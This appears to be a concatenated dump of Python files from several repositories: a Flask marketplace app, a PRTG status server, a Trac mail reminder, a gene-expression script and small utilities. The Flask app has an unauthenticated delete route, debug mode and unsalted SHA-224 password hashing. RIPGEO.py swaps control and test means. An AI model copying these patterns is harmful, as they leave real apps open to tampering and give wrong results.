boogie!..') # Gimme some lovin' if __name__ == '__main__': main()
Python
102
24.441177
90
/bot.py
0.529276
0.511556
jlstack/Online-Marketplace
refs/heads/master
from application import db class Product(db.Model): id = db.Column('id', db.Integer, primary_key=True) name = db.Column('name', db.String(128), nullable=False) description = db.Column('description', db.TEXT, nullable=False) image_path = db.Column('image_path', db.String(128), nullable=True) quantity = db.Column('quantity', db.Integer, default=1) price = db.Column('price', db.FLOAT, default=0.0) def __init__(self, name, description, image_path='', quantity=1, price=0.0): self.name = name self.description = description self.image_path = image_path self.quantity = quantity self.price = price def __repr__(self): return str({'name':self.name, 'description':self.description, 'image_path': self.image_path, 'quantity': self.quantity, 'price': self.price}) class User(db.Model): id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(128), index=True, unique=True) password = db.Column(db.String(256), nullable=False) def __init__(self, username, password): self.username = username self.password = password def __repr__(self): return '<User %r>' % (self.username) class Image(db.Model): id = db.Column('id', db.Integer, primary_key=True) name = db.Column('name', db.String(128), nullable=False) image_path = db.Column('image_path', db.String(128), nullable=False) display_number = db.Column('display_number', db.Integer, nullable=False) def __init__(self, name, image_path, display_number): self.name = name self.image_path = image_path self.display_number = display_number def __repr__(self): return str({'name': self.name, 'image_path': self.image_path, 'display_number': self.display_number})
Python
45
39.288887
149
/application/models.py
0.644236
0.630998
jlstack/Online-Marketplace
refs/heads/master
from flask import Flask, Response, session, flash, request, redirect, render_template, g import sys import os import base64 from flask_login import LoginManager, UserMixin, current_user, login_required, login_user, logout_user import hashlib from flask_openid import OpenID errors = [] try: from application import db from application.models import Product, User, Image import yaml with open("db.yml") as db_file: db_entries = yaml.safe_load(db_file) db.create_all() for user in db_entries["users"]: usr = User(user["username"], user["password_hash"]) db.session.add(usr) db.session.commit() for project in db_entries["projects"]: proj = Product(project["name"], project["description"], project["default_image"], 1, 0) db.session.add(proj) db.session.commit() for i in range(0, len(project["images"])): img = Image(project['name'], project["images"][i], i) db.session.add(img) db.session.commit() db.session.close() except Exception as err: errors.append(err.message) # EB looks for an 'application' callable by default. application = Flask(__name__) # config application.config.update( DEBUG = True, SECRET_KEY = os.urandom(24) ) @application.route("/login", methods=["GET", "POST"]) def login(): if str(request.method) == 'GET': if not session.get('logged_in'): return render_template('login.html') else: redirect("/") username = request.form['username'] password = request.form['password'] password = hashlib.sha224(password.encode('utf-8')).hexdigest() user = User.query.filter_by(username=username, password=password).first() if user is not None: session['logged_in'] = True return redirect("/") return redirect("/login") @application.route("/logout") def logout(): session['logged_in'] = False return redirect('/') @application.route('/') def index(): return render_template('home.html') @application.route('/gallery') def gallery(): products = Product.query.order_by(Product.id.asc()) return render_template('products.html', products=products) @application.route('/about') def about(): return render_template('about.html') @application.route('/contact') def contact(): return render_template('contact.html') @application.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 @application.route('/dir') def stuff(): return str(dir(Product.id)) @application.route('/add', methods=['GET', 'POST']) def add(): if not session.get('logged_in'): return render_template('login.html') if str(request.method) == 'POST': try: vals = request.form.to_dict() files = request.files.getlist("image") for i in range(0, len(files)): file = files[i] ext = file.filename.rsplit('.', 1)[1].lower() if ext in ['png', 'jpg', 'jpeg']: filename = "/static/images/" + base64.urlsafe_b64encode(file.filename) + "." + ext file.save("." + filename) if i == 0: product = Product(vals['name'], vals['description'], filename, 1, 0) db.session.add(product) db.session.commit() db.session.close() img = Image(vals['name'], filename, i) db.session.add(img) db.session.commit() db.session.close() except Exception as err: db.session.rollback() return err.message return render_template('add_product.html') @application.route('/errors') def get_errors(): return str(errors) @application.route('/products') def get_products(): products = Product.query.order_by(Product.id.desc()) stuff = [x.name for x in products] return str(stuff) @application.route('/pin/<pin_id>') def pin_enlarge(pin_id): p = Product.query.filter_by(id=pin_id).first() images = Image.query.filter_by(name=p.name).order_by(Image.display_number.asc()) return render_template('pin_focus.html', p=p, images=images) @application.route('/delete/<pin_id>') def delete(pin_id): Product.query.filter_by(id = pin_id).delete() db.session.commit() db.session.close() return redirect("/gallery") # run the app. if __name__ == "__main__": # Setting debug to True enables debug output. This line should be # removed before deploying a production app. application.debug = True application.run()
Python
147
30.612246
102
/application.py
0.614805
0.60835
jlstack/Online-Marketplace
refs/heads/master
from flask import Flask from flask.ext.sqlalchemy import SQLAlchemy import os def get_config(): config = {} if 'RDS_HOSTNAME' in os.environ: env = { 'NAME': os.environ['RDS_DB_NAME'], 'USER': os.environ['RDS_USERNAME'], 'PASSWORD': os.environ['RDS_PASSWORD'], 'HOST': os.environ['RDS_HOSTNAME'], 'PORT': os.environ['RDS_PORT'], } config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://' + env['USER'] + ':' + env['PASSWORD'] + '@' + env['HOST'] + ':' + env['PORT'] + '/' + env['NAME'] config['SQLALCHEMY_POOL_RECYCLE'] = 3600 config['WTF_CSRF_ENABLED'] = True else: config = None return config config = get_config() application = Flask(__name__) db = None if config is not None: application.config.from_object(config) try: db = SQLAlchemy(application) except Exception as err: print(err.message)
Python
30
29.4
160
/application/__init__.py
0.588816
0.58443
viaacode/status
refs/heads/master
from locust import HttpLocust, TaskSet, task class WebsiteTasks(TaskSet): @task def index(self): self.client.get("/") @task def status(self): self.client.get("/status") @task def hetarchief(self): self.client.get("/status/hetarchief.png") @task def ftp(self): self.client.get("/status/ftp.png") class WebsiteUser(HttpLocust): task_set = WebsiteTasks min_wait = 5000 max_wait = 15000
Python
23
19.52174
49
/locustfile.py
0.605932
0.586864
viaacode/status
refs/heads/master
import requests import json import functools import logging # from collections import defaultdict # from xml.etree import ElementTree # ref: https://stackoverflow.com/questions/7684333/converting-xml-to-dictionary-using-elementtree # def etree_to_dict(t): # d = {t.tag: {} if t.attrib else None} # children = list(t) # if children: # dd = defaultdict(list) # for dc in map(etree_to_dict, children): # for k, v in dc.items(): # dd[k].append(v) # d = {t.tag: {k: v[0] if len(v) == 1 else v # for k, v in dd.items()}} # if t.attrib: # d[t.tag].update(('@' + k, v) # for k, v in t.attrib.items()) # if t.text: # text = t.text.strip() # if children or t.attrib: # if text: # d[t.tag]['#text'] = text # else: # d[t.tag] = text # return d logger = logging.getLogger(__name__) entrypoint = '/api' class PRTGError(Exception): pass class PRTGAuthenticationError(PRTGError): pass class ResponseTypes: @staticmethod def json(data): return json.loads(data) # @staticmethod # def xml(data): # return etree_to_dict(ElementTree.XML(data)) class API: def __init__(self, host, username, passhash): self._requests = requests self._host = host self._authparams = { "username": username, "passhash": passhash } @property def requests(self): return self._requests @requests.setter def requests(self, val): self._requests = val def _call(self, method, response_type=None, **params): if response_type is None: response_type = 'json' if not hasattr(ResponseTypes, response_type): raise ValueError("Unknown response type", response_type) url = '%s%s/%s.%s' % (self._host, entrypoint, method, response_type) try: params = dict(params, **self._authparams) response = self._requests.get(url, params=params) if response.status_code != 200: logger.warning("Wrong exit code %d for %s", response.status_code, url) raise PRTGError("Invalid HTTP code response", response.status_code) return getattr(ResponseTypes, response_type)(response.content.decode('utf-8')) except Exception as e: raise PRTGError(e) from e def __getattr__(self, item): return functools.partial(self._call, item) @staticmethod def from_credentials(host, username, password, _requests=None): url = '%s%s/getpasshash.htm' % (host, entrypoint) params = { "username": username, "password": password, } if _requests is None: _requests = requests.Session() response = _requests.get(url, params=params) if response.status_code != 200: raise PRTGAuthenticationError("Couldn't authenticate", response.status_code, response.content) result = API(host, username, response.content) result.requests = _requests return result
Python
108
28.666666
106
/src/viaastatus/prtg/api.py
0.575663
0.570671
viaacode/status
refs/heads/master
from argparse import ArgumentParser from viaastatus.server import wsgi import logging def argparser(): """ Get the help and arguments specific to this module """ parser = ArgumentParser(prog='status', description='A service that supplies status information about our platforms') parser.add_argument('--debug', action='store_true', help='run in debug mode') parser.add_argument('--host', help='hostname or ip to serve api') parser.add_argument('--port', type=int, default=8080, help='port used by the server') parser.add_argument('--log-level', type=str.lower, default='warning', dest='log_level', choices=list(map(str.lower, logging._nameToLevel.keys())), help='set the logging output level') return parser def main(): args = argparser().parse_args() logging.basicConfig(level=args.log_level.upper()) logging.getLogger().setLevel(args.log_level.upper()) del args.log_level wsgi.create_app().run(**args) if __name__ == '__main__': main()
Python
34
32.088234
120
/src/viaastatus/server/cli.py
0.616889
0.613333
viaacode/status
refs/heads/master
from setuptools import setup, find_packages with open('README.md') as f: long_description = f.read() with open('requirements.txt') as f: requirements = list(map(str.rstrip, f.readlines())) setup( name='viaastatus', url='https://github.com/viaacode/status/', version='0.0.3', author='VIAA', author_email='support@viaa.be', descriptiona='Status services', long_description=long_description, classifiers=[ 'Programming Language :: Python', 'Programming Language :: Python :: 3', ], python_requires='>=3.4', packages=find_packages("src"), package_dir={"": "src"}, package_data={'viaastatus': ['server/static/*']}, include_package_data=True, install_requires=requirements, extras_require={ 'test': [ "pytest>=4.2.0" ], 'loadtest': [ "locustio>=0.11.0" ], 'gunicorn': [ 'gunicorn>=19.9.0' ], 'uwsgi': [ 'uWSGI>=2.0.18' ], 'waitress': [ 'waitress>=1.2.1' ] }, platforms='any' )
Python
45
23.48889
55
/setup.py
0.534483
0.512704
viaacode/status
refs/heads/master
from flask import Flask, abort, Response, send_file, request, flash, session, render_template from flask import url_for, redirect from viaastatus.prtg import api from viaastatus.decorators import cacher, templated from os import environ import logging from configparser import ConfigParser import re import hmac from hashlib import sha256 from functools import wraps, partial import argparse import itertools import werkzeug.contrib.cache as workzeug_cache from viaastatus.server.response import Responses import requests log_level = logging._nameToLevel[environ.get('VERBOSITY', 'debug').upper()] logging.basicConfig(level=log_level) logger = logging.getLogger(__name__) logging.getLogger().setLevel(log_level) def normalize(txt): txt = txt.replace(' ', '-').lower() txt = re.sub('-{2,}', '-', txt) txt = re.sub(r'\([^)]*\)', '', txt) txt = re.sub(r'\[[^)]*\]', '', txt) txt = re.sub('-[0-9]*$', '', txt) txt = re.sub('-{2,}', '-', txt) return txt def create_app(): app = Flask(__name__) config = ConfigParser() config.read(environ.get('CONFIG_FILE', 'config.ini')) app_config = config['app'] cache_timeout = int(app_config.get('cache_timeout', 30)) if cache_timeout > 0: cache_ = workzeug_cache.SimpleCache(default_timeout=cache_timeout) else: cache_ = workzeug_cache.NullCache() cache = cacher(cache_)() cache_other = cacher(cache_, timeout=cache_timeout, key='other/%s')() app.secret_key = app_config['secret_key'] salt = app_config['salt'] @cache_other def get_sensors(prtg_) -> dict: sensors = {} cols = 'objid,name,device' ippattern = re.compile(r'[\d\.]+') for sensor in prtg_.table(content='sensors', filter_type=['http', 'ftp', 'httptransaction'], filter_active=-1, columns=cols)['sensors']: parentname = sensor['device'] sensor_name = sensor['name'] if sensor_name.startswith('HTTP'): # filter out IPs if ippattern.fullmatch(parentname): continue sensor_name = parentname + ' - ' + sensor_name sensor_name = normalize(sensor_name) if sensor_name in sensors: logger.warning("Sensor '%s' is conflicting (current id: %d, requested to set to: %d), ignored", sensor_name, sensors[sensor_name], sensor['objid']) continue sensors[sensor_name] = int(sensor['objid']) return sensors def _token(*args, **kwargs): """Calculates the token """ params = str([args, kwargs]) return hmac.new(salt.encode('utf-8'), params.encode('utf-8'), sha256).hexdigest()[2:10] def secured_by_login(func): """ Decorator to define routes secured_by_login """ @wraps(func) def _(*args, **kwargs): if not login_settings: logger.info('Login requested but refused since no login data in config') abort(404) if not session.get('authenticated'): return _login() return func(*args, **kwargs) return _ def secured_by_token(func): """ Decorator to define routes secured_by_token. """ @wraps(func) def _(*args, **kwargs): check_token = 'authenticated' not in session if 'ignore_token' in kwargs: check_token = not kwargs['ignore_token'] del kwargs['ignore_token'] if check_token: token = request.args.get('token') expected_token = _token(*args, **kwargs) if token != expected_token: logger.warning("Wrong token '%s' for %s, expected: '%s'", token, func.__name__, expected_token) abort(401) return func(*args, **kwargs) _._secured_by_token = _token return _ prtg_conf = config['prtg'] _requests = requests.Session() if 'certificate' in prtg_conf: _requests.cert = (prtg_conf['certificate'], prtg_conf['private_key']) prtg = api.API.from_credentials(prtg_conf['host'], prtg_conf['username'], prtg_conf['password'], _requests) login_settings = None if config.has_section('login'): login_settings = dict(config['login']) class Choices: @staticmethod def sensor(): return list(get_sensors(prtg).keys()) @staticmethod def type_(): return {'json', 'png', 'txt', 'html'} @staticmethod def ttype(): return {'json', 'txt', 'html'} @app.route('/login', methods=['GET']) @templated('login.html') def _login(): pass @app.route('/urls', methods=['GET']) @secured_by_login @templated('urls.html') def _urls(): context = {} rules = [rule for rule in application.url_map.iter_rules() if rule.is_leaf and rule.endpoint != 'static' and not rule.endpoint.startswith('_')] method_types = {} for i in range(len(rules)): rule = rules[i] rules[i] = rules[i].__dict__ kargs = [argname for argname in rule.arguments if hasattr(Choices, argname)] vargs = [getattr(Choices, argname)() for argname in kargs] methods = [] for params in itertools.product(*vargs): params = dict(zip(kargs, params)) url = url_for(rule.endpoint, **params) view_func = app.view_functions[rule.endpoint] if hasattr(view_func, '_secured_by_token'): url += '?token=%s' % (view_func._secured_by_token(**params)) methods.append({ "name": rule.endpoint, "params": params, "url": url, }) method_types[rule.endpoint] = methods context['method_types'] = method_types return context @app.route('/login', methods=['POST']) def _do_login(): if not login_settings: logger.info('Login requested but refused since no login data in config') abort(404) if request.form['password'] != login_settings['password'] or \ request.form['username'] != login_settings['username']: flash('Invalid credentials!') else: session['authenticated'] = True return redirect('/urls') @app.route('/', methods=['GET']) @cache @templated('oldstatus.html') def index_(): pass @app.route('/sensors.<ttype>') @cache @secured_by_token def sensors_(ttype): if ttype not in Choices.ttype(): abort(404) return getattr(Responses, ttype)(Choices.sensor()) @app.route('/status/<sensor>.<type_>', methods=['GET']) @cache @secured_by_token def status_(sensor, type_): """ :param str sensor: Name of the sensor :param str type_: Response type :return: """ if type_ not in Choices.type_(): abort(404) try: sensors = get_sensors(prtg) if sensor not in sensors: abort(404) sensor_id = sensors[sensor] status = prtg.getsensordetails(id=sensor_id)['sensordata'] except Exception as e: if type_ == 'png': return Responses.status(None) raise e if type_ == 'png': if int(status['statusid']) in [3, 4]: status = True elif int(status['statusid']) in [7, 8, 9, 10, 12]: status = None else: status = False return Responses.status(status) if type_ == 'txt': status = status['statustext'] elif type_ == 'html': status_msg = ''' <dl> <dt>%s</dt> <dd><a href="%s/sensor.htm?id=%d">%s</a></dd> </dl> ''' status = status_msg % (prtg._host, sensor, sensor_id, status['statustext']) return getattr(Responses, type_)(status) @app.route('/status', methods=['GET']) @templated('statuspage.html') def status_page(): if not config.has_section('aliases'): abort(404) aliases = {url: fwd.split(':')[1] for url, fwd in config['aliases'].items()} return dict(aliases=aliases) # add aliases if config.has_section('aliases'): for url, target in config['aliases'].items(): target = target.split(':') name = target.pop(0) func = app.view_functions[name] kwargs = dict(ignore_token=True) func = partial(func, *target, **kwargs) func.__name__ = url app.route(url)(func) return app application = create_app() if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--debug', action='store_true', help='run in debug mode') parser.add_argument('--host', help='hostname or ip to serve app') parser.add_argument('--port', type=int, default=1111, help='port used by the server') args = parser.parse_args() if args.debug: logging.basicConfig(level=logging.DEBUG) logger.setLevel(logging.DEBUG) application.run(host=args.host, port=args.port, debug=args.debug)
Python
308
30.733767
115
/src/viaastatus/server/wsgi.py
0.534015
0.528389
viaacode/status
refs/heads/master
from functools import wraps, partial from flask import request, render_template def cached(key='view/%s', cache=None, **extra_cache_kwargs): def decorator(f): @wraps(f) def decorated(*args, **kwargs): cache_key = key % request.path rv = cache.get(cache_key) if rv is not None: return rv rv = f(*args, **kwargs) cache.set(cache_key, rv, **extra_cache_kwargs) return rv return decorated return decorator def cacher(cache, **kwargs): return partial(cached, cache=cache, **kwargs) def templated(template=None): def decorator(f): @wraps(f) def decorated(*args, **kwargs): template_name = template if template_name is None: template_name = request.endpoint \ .replace('.', '/') + '.html' ctx = f(*args, **kwargs) if ctx is None: ctx = {} elif not isinstance(ctx, dict): return ctx return render_template(template_name, **ctx) return decorated return decorator
Python
39
28.641026
60
/src/viaastatus/decorators.py
0.536332
0.536332
viaacode/status
refs/heads/master
import os from flask import jsonify, Response import flask class FileResponse(Response): default_mimetype = 'application/octet-stream' def __init__(self, filename, **kwargs): if not os.path.isabs(filename): filename = os.path.join(flask.current_app.root_path, filename) with open(filename, 'rb') as f: contents = f.read() response = contents super().__init__(response, **kwargs) class StatusResponse(FileResponse): default_mimetype = 'image/png' def __init__(self, status, **kwargs): if status is True: status = 'ok' elif status is False: status = 'nok' else: status = 'unk' filename = 'static/status-%s.png' % (status,) super().__init__(filename, **kwargs) class Responses: @staticmethod def json(obj): return jsonify(obj) @staticmethod def html(obj): return Response('<html><body>%s</body></html>' % (obj,), content_type='text/html') @staticmethod def txt(obj): if type(obj) is not str: obj = '\n'.join(obj) return Response(obj, content_type='text/plain') @staticmethod def status(status_): return StatusResponse(status_)
Python
53
22.981133
90
/src/viaastatus/server/response.py
0.581432
0.581432
esyr/trac-hacks
refs/heads/master
#!/usr/bin/env python # -*- coding: utf-8 -*- # # if you want to test this script, set this True: # then it won't send any mails, just it'll print out the produced html and text #test = False test = False #which kind of db is Trac using? mysql = False pgsql = False sqlite = True # for mysql/pgsql: dbhost="localhost" dbuser="database_user" dbpwd="database_password" dbtrac="database_of_trac" #or for sqlite: sqlitedb='/path/to/trac/db/trac.db' #or if your db is in memory: #sqlitedb=':memory:' # the url to the trac (notice the slash at the end): trac_url='https://trac.example.org/path/to/trac/' # the default domain, where the users reside # ie: if no email address is stored for them, username@domain.tld will be used to_domain="@example.org" import codecs, sys sys.setdefaultencoding('utf-8') import site # importing the appropriate database connector # (you should install one, if you want to use ;) # or you can use an uniform layer, like sqlalchemy) if mysql: import MySQLdb if pgsql: import psycopg2 if sqlite: from pysqlite2 import dbapi2 as sqlite import time import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText db = None cursor = None try: if mysql: db = MySQLdb.connect(host=dbhost, user=dbuser, passwd=dbpwd, db=dbtrac) if pgsql: db = psycopg2.connect("host='"+ dbhost +"' user='" + dbuser + "' password='" + dbpwd + "' dbname='" + dbtrac + "'") if sqlite: db = sqlite.connect(sqlitedb) except: print "cannot connect to db" raise sys.exit(1) cursor = db.cursor() fields = ['summary', 'component', 'priority', 'status', 'owner', 'reporter'] #I think MySQL needs '"' instead of "'" without any ';', # with more strict capitalization (doubling quotes mean a single quote ;) ) # so you'll have to put these queries into this format: # sql="""query""" or sql='"query"' like # sql = '"SELECT owner FROM ticket WHERE status !=""closed""""' # for postgresql simply use: sql = "select id, %s from ticket where status == 'testing' or status == 'pre_testing';" % ', '.join(fields) cursor.execute(sql) tickets = cursor.fetchall() tickets_dict = {} # Reading last exec time last_exec_path = '/var/local/trac_testing_tickets_notify_last_exec_timestamp' last_exec = 0 try: f = open(last_exec_path, "r") last_exec = int(f.read()) f.close() except: last_exec = 0 cur_time = int(time.time()) notify_tickets = set() time_quant = 86400 # seconts per day - frequence of reminds ticket_url = 'https://trac.example.org/path/to/trac/ticket/' recipient_list = ['recipient1@example.org', 'recipient2@example.arg', ] for ticket in tickets: tickets_dict[ticket[0]] = {'id': ticket[0]} offset = 1 for field in fields: tickets_dict[ticket[0]][field] = ticket[offset] offset += 1 sql = "select time from ticket_change where ticket == %d and field == 'status' and (newvalue == 'testing' or newvalue == 'pre_testing') order by time desc limit 1;" % ticket[0] cursor.execute(sql) last_time = cursor.fetchall() if len(last_time) > 0: last_time = last_time[0][0] if (int((cur_time - last_time) / time_quant) != int((last_exec - last_time) / time_quant)) and int((cur_time - last_time) / time_quant) > 0: notify_tickets |= set([ticket[0], ]) # No new tickets - aborting if len(notify_tickets) == 0: print 'No new tickets: aborting.' exit() #calculating column widths column_widths = {} for id in notify_tickets: for field, value in tickets_dict[id].iteritems(): column_widths[field] = field in column_widths and max(column_widths[field], len("%s" % value)) or max(len("%s" % value), len("%s" % field)) #generating mail text msg_header = """ List of tickets pending your attention: """ msg_tail = """ Trac testing tickets notification script. """ header_line_template = '|| %%(id)%ds ||' % (len(ticket_url) + column_widths['id']) normal_line_template = '|| %s%%(id)%ds ||' % (ticket_url, column_widths['id']) line_template = '' for field in fields: line_template += ' %%(%s)%ds ||' % (field, column_widths[field]) header = { 'id' : 'URL' } for field in fields: header[field] = field table_header = (header_line_template + line_template) % header table = [] for id in notify_tickets: table.append((normal_line_template + line_template) % tickets_dict[id]) msg = '\n'.join ([msg_header, table_header] + table + [msg_tail]) htmlmsg_header = ''' <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <table> ''' htmlmsg_tail = ''' </table> </body> </html> ''' normal_line_template = '<td><a href="%s%%(id)s">%%(id)s</a></td>' % ticket_url line_template = '' for field in fields: line_template += '<td>%%(%s)s</td>' % field htmltable_header = '<tr><th>' + '</th><th>'.join(['Ticket'] + fields) + '</th></tr>' htmltable = [] for id in notify_tickets: htmltable.append(('<tr>' + normal_line_template + line_template + '</tr>') % tickets_dict[id]) htmlmsg = '\n'.join ([htmlmsg_header, htmltable_header] + htmltable + [htmlmsg_tail]) import email.Charset email.Charset.add_charset('utf-8', email.Charset.SHORTEST, None, None) if test: print msg print print htmlmsg else: mailmsg = MIMEMultipart('alternative') mailmsg['Subject'] = "Report testing Tickets at %s" % time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())) mailmsg['From'] = 'trac@example.org' mailmsg['To'] = ', '.join(recipient_list) part1 = MIMEText(msg, 'plain') part2 = MIMEText(htmlmsg.encode('utf-8', 'replace'), 'html', 'utf-8') mailmsg.attach(part1) mailmsg.attach(part2) s = smtplib.SMTP() s.connect() s.sendmail(mailmsg['From'], recipient_list, mailmsg.as_string()) s.close() f = open(last_exec_path, "w") f.write("%s" % cur_time) f.close()
Python
198
28.641415
180
/mail_report.py
0.64304
0.637076
rajashekarvarma/RIPGEO
refs/heads/master
import GEOparse # Python package to upload a geo data import pandas as pd import numpy as np from scipy import stats from statsmodels.stats import multitest import seaborn as sns import matplotlib.pyplot as plt ############### Fetch Agilent data ############### print('\n\n',"******...Hi Welcome to RIPGEO...******",'\n\n') GSE_ID = input('Please enter your GSE ID (ex:GSE62893): ') print('\n',"Provided GSE ID: ",GSE_ID) print('\n',"Intitating data extraction...",'\n\n') gse = GEOparse.get_GEO(geo=GSE_ID, destdir="./") plt_name=[] # print(gse.gpls) for pl_name, pl in gse.gpls.items(): plt_name.append(pl_name) plt_name=''.join(plt_name) print("Platform Name:", plt_name) pivoted_control_samples = gse.pivot_samples('VALUE') # print(pivoted_control_samples.head()) ######## Filter probes that are not expressed worst 25% genes are filtered out pivoted_control_samples_average = pivoted_control_samples.median(axis=1) # print("Number of probes before filtering: ", len(pivoted_control_samples_average)) expression_threshold = pivoted_control_samples_average.quantile(0.25) expressed_probes = pivoted_control_samples_average[pivoted_control_samples_average >= expression_threshold].index.tolist() # print("Number of probes above threshold: ", len(expressed_probes)) samples = gse.pivot_samples("VALUE").ix[expressed_probes] # print(samples.head()) # print(gse.gpls[plt_name].table) ######## Annotate matrix table samples_annotated = samples.reset_index().merge(gse.gpls[plt_name].table[["ID", "GB_ACC"]], left_on='ID_REF', right_on="ID").set_index('ID_REF') # print(samples_annotated.head()) del samples_annotated["ID"] # print(samples_annotated.head()) samples_annotated = samples_annotated.dropna(subset=["GB_ACC"]) samples_annotated = samples_annotated[~samples_annotated.GB_ACC.str.contains("///")] samples_annotated = samples_annotated.groupby("GB_ACC").median() # print(samples_annotated.index) print('\n','Column names from the matrix: ',samples_annotated.columns) ######## Extract matrix data to a csv file exprs = [] gsmNames = [] metadata = {} for gsm_name, gsm in gse.gsms.items(): # print(gsm.metadata['type'][0]) if gsm.metadata['type'][0]=='RNA': # Expression data if len(gsm.table)>0: tmp = gsm.table['VALUE'] # print(tmp) tmp.index = gsm.table['ID_REF'] gsmNames.append(gsm_name) if len(exprs)==0: exprs = tmp.to_frame() else: exprs = pd.concat([exprs,tmp.to_frame()],axis=1) print('\n','Extracting metadata...','\n') ######## extract metadata to csv file for gsm_name, gsm in gse.gsms.items(): if gsm.metadata['type'][0]=='RNA': for key,value in gsm.metadata.items(): # print(key) # print(value) if (key=='characteristics_ch1' or key=='characteristics_ch2') and (len([i for i in value if i!=''])>1 or value[0].find(': ')!=-1): # print(value) tmpVal = 0 for tmp in value: splitUp = [i.strip() for i in tmp.split(':')] # print(splitUp) if len(splitUp)==2: if not splitUp[0] in metadata: metadata[splitUp[0]] = {} metadata[splitUp[0]][gsm_name] = splitUp[1] else: if not key in metadata: metadata[key] = {} metadata[key][gsm_name] = splitUp[0] else: if not key in metadata: metadata[key] = {} if len(value)==1: metadata[key][gsm_name] = ' '.join([j.replace(',',' ') for j in value]) # Write expression data matrix to file exprs.columns = gsmNames with open(GSE_ID+'exprs.csv','w') as outFile: exprs.to_csv(outFile) # Write metadata matrix to file with open(GSE_ID+'metadata.csv','w') as outFile: outFile.write('Metadata,'+','.join(gsmNames)) for key in metadata: tmp = [key] for gsm_name in gsmNames: if gsm_name in metadata[key]: tmp.append(metadata[key][gsm_name]) else: tmp.append('NA') outFile.write('\n'+','.join(tmp)) print('\n','Data matrix and metadata for',GSE_ID,'have been written to',GSE_ID+'exprs.csv',GSE_ID+'metadata.csv @ cwd','\n') ######## select control and test sample columns samples_annotated = samples_annotated.astype(float) control_sample = input('Please enter column numbers of control samples (ex:0,2,4): ') control_samples = control_sample.split(',') control_samples = [int(i) for i in control_samples] Test_sample = input('Please enter column numbers of test samples (ex:3,5,7): ') Test_samples = Test_sample.split(',') Test_samples = [int(i) for i in Test_samples] print('\n','control samples column names entered:',control_samples,'\n') print('\n','Test samples column names entered:',Test_samples,'\n') ######## perform t-test for the data print('\n','Performing independednt T Test on the selected data...'+'\n') samples_annotated["Ttest"] = stats.ttest_ind(samples_annotated.T.iloc[Test_samples, :],samples_annotated.T.iloc[control_samples, :], equal_var=True, nan_policy="omit")[1] ######## perform anova # samples_annotated['Anova_one'] = [stats.f_oneway(samples_annotated.T.iloc[Test_samples, x],samples_annotated.T.iloc[control_samples, x])[1] for x in range(samples_annotated.shape[0])] # samples_annotated['Ttest'].to_csv('pvalues.csv') ######## filter data based FDR (<0.05) samples_annotated["FDR"] = multitest.multipletests(samples_annotated['Ttest'], alpha=0.05, method='fdr_bh', is_sorted=False, returnsorted=False)[1] # print(samples_annotated.head()) filtered_samples = samples_annotated.sort_values(by="FDR") f_samples = pd.DataFrame() f_samples['control'] = filtered_samples.T.iloc[Test_samples,:].mean() f_samples['test'] = filtered_samples.T.iloc[control_samples,:].mean() f_samples['p-value'] = filtered_samples['Ttest'] f_samples['FDR'] = filtered_samples['FDR'] ######## calculate log2FC f_samples['log2FC'] = f_samples['test'].apply(np.log2) - f_samples['control'].apply(np.log2) print('\n','Calculating Log2 values of the data...','\n') f_samples.to_csv('complete_unfiltered_data.csv') ######## filter gene list based on log2FC f_samples = f_samples[f_samples["FDR"] < 0.05] print('\n','Number of genes remaining after FDR filter of 0.05:',len(f_samples)) up_c = float(input('Please enter log2FC cutoff value for up regulation(ex:0.5): ')) dwn_c = float(input('Please enter log2FC cutoff value for down regulation(ex:-0.5): ')) diff_up = f_samples[f_samples['log2FC'] >= up_c] diff_down = f_samples[f_samples['log2FC'] <= dwn_c] ######## write up and down regulated genes to csv diff_up.to_csv('Upregulated_genes.csv') diff_down.to_csv('Downregulated_genes.csv') ######## plot log difference of upregulated and down regulated genes plot_y = input('Do you want to plot bar plot for log2 fold difference (yes/no): ') if plot_y == 'yes': diff = pd.concat([diff_up,diff_down]) diff_vals = diff['log2FC'].sort_values() counter = np.arange(len(diff_vals.values)) fig, ax = plt.subplots(figsize = (20,10)) ax.bar(counter,diff_vals.values, width=0.5) ax.set_xticks(counter) ax.set_xticklabels(diff_vals.index.values, rotation=90) ax.set_title("Gene expression differences of Control vs Test") ax.set_ylabel("log2 difference") plt.show() print('\n','Task completed...Output written successfully to current working directory.') else: print('\n','Task completed...Output written successfully to current working directory.')
Python
200
38.439999
185
/RIPGEO.py
0.608529
0.599011
ramimanna/Email-Secret-Santa
refs/heads/master
import os import random import smtplib # Email from dotenv import load_dotenv # For getting stored password #import getpass # For dynamically enter password load_dotenv() username = input("E-mail: ") # e.g. "your_gmail_to_send_from@gmail.com" password = os.getenv("PASSWORD") # alternatively: getpass.getpass() def santa_message_body(santa_assigment): return f"Your secret santa assignment is {santa_assigment}." def send_email(to_person, to_email, subject, message_body): server = smtplib.SMTP('smtp.gmail.com', 587) server.ehlo() server.starttls() server.login(username, password) sender_name = "Rami Manna" message = f"""From: {sender_name} <{username}> To: {to_person} <{to_email}> MIME-Version: 1.0 Content-type: text/html Subject: {subject} {message_body} """ server.sendmail(username, to_email, message) server.quit() def send_secret_santas(participants): not_gifted = {name for name, email in participants} for name, email in participants: santa_assigment = random.choice(list(not_gifted - {name})) not_gifted.remove(santa_assigment) message_body = santa_message_body(santa_assigment) subject = "Your Secret Santa Assignment!" send_email(name, email, subject, message_body) PARTICIPANTS = [('Harry Potter', 'potter@hogwarts.edu'), ('Hermione Granger', "hermione@hogwarts.edu")] if __name__ == "__main__": send_secret_santas(PARTICIPANTS)
Python
51
26.078432
67
/send_email.py
0.674385
0.670767
arvinwiyono/gmap-places
refs/heads/master
import requests import json import pandas as pd url = "https://maps.googleapis.com/maps/api/place/textsearch/json" key = "change_this" cities = [ 'jakarta', 'surabaya', 'malang', 'semarang' ] cols = ['street_address', 'lat', 'long'] df = pd.DataFrame(columns=cols) for city in cities: querystring = {"query":f"indomaret in {city}","key":key} res = requests.request("GET", url, params=querystring) json_res = json.loads(res.text) for result in json_res['results']: address = result['formatted_address'] lat = result['geometry']['location']['lat'] lng = result['geometry']['location']['lng'] df = df.append(pd.Series([address, lat, lng], index=cols), ignore_index=True) df.to_csv('for_pepe.csv', index=False)
Python
24
31.125
85
/get_locations.py
0.640726
0.640726
